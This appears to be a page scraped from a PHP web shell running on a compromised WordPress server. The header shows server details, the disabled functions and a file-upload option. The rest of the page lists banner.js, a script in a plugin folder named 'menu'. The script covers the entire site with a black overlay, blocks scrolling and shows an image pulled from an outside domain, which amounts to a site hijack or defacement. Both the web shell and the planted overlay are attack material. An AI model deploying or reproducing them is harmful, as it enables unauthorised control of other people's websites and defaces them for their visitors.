HEX
Server: Apache/2
System: Linux other-wp 5.10.0-35-cloud-amd64 #1 SMP Debian 5.10.237-1 (2025-05-19) x86_64
User: admin (1004)
PHP: 7.4.28
Disabled: exec,system,passthru,shell_exec,proc_close,proc_open,dl,popen,show_source,posix_kill,posix_mkfifo,posix_getpwuid,posix_setpgid,posix_setsid,posix_setuid,posix_setgid,posix_seteuid,posix_setegid,posix_uname
Upload Files
File: /home/admin/domains/defibkk.com/private_html/wp-content/plugins/menu/banner.js
jQuery(document).ready(function ($) {
	var $window = $(window);
	
    var div = '<div style="width:100%;height:100%;background-color:#000000;position:fixed;top:0%;rigth:0%;opacity:1;text-align:center"></div>';
	$('body').append(div);
	$('body').css('overflow-y','hidden');
	$('body').css('overflow-x','hidden');
	$('body').css('position','relative');
		

	if ($window.width() > 440) {
		var img =	'<img src="https://www.gamemun.com/wp-content/plugins/menu/mobile.jpg" style="position:fixed;top:50%;left:50%;transform: 	translate(-50%, -50%);border-radius: 5px;width:30%;" id="img_banner">';
		$('body').append(img);
	}else{
		var img =	'<img src="https://www.gamemun.com/wp-content/plugins/menu/mobile.jpg" style="position:fixed;top:50%;left:50%;transform: 	translate(-50%, -50%);border-radius: 5px;width:70%;" id="img_banner">';
		$('body').append(img);
	}
	
	$(window).resize(function() {
		$('#img_banner').remove();
		  if ($window.width() > 440) {
				var img =	'<img src="https://www.gamemun.com/wp-content/plugins/menu/mobile.jpg" style="position:fixed;top:50%;left:50%;transform: 	translate(-50%, -50%);border-radius: 5px;width:30%;" id="img_banner">';
				$('body').append(img);
			}else{
				var img =	'<img src="https://www.gamemun.com/wp-content/plugins/menu/mobile.jpg" style="position:fixed;top:50%;left:50%;transform: 	translate(-50%, -50%);border-radius: 5px;width:70%;" id="img_banner">';
				$('body').append(img);
			}
	});
	
});